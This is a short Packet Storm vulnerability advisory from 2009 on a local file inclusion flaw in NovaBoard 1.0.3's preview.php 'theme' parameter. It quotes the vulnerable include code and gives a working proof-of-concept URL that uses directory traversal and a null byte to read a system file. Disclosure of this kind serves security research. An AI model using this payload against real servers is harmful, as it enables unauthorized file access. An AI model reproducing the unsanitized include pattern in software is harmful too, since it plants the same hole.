NovaBoard 1.0.3 Local File Inclusion

2009-04-03T00:00:00
ID PACKETSTORM:76325
Type packetstorm
Reporter SirGod
Modified 2009-04-03T00:00:00

Description

                                        
                                            `##############################################################################################  
[+] NovaBoard v1.0.3 (preview.php theme) Local File Inclusion Vulnerability  
[+] Discovered By SirGod  
[+] www.mortal-team.net  
[+] www.h4cky0u.org  
##############################################################################################  
  
[+] Local File Inclusion  
  
register_globals = on  
magic_quotes_gpc=off  
  
- Vulnerable code in /includes/forums/preview.php :  
  
-----------------------------------------------------------------  
if (file_exists("../../themes/$theme/scripts/php/parse.php")){  
include "../../themes/$theme/scripts/php/parse.php";  
-----------------------------------------------------------------  
  
PoC :  
  
http://127.0.0.1/includes/forums/preview.php?theme=../../../../../../BOOTSECT.BAK%00  
  
  
  
##############################################################################################  
`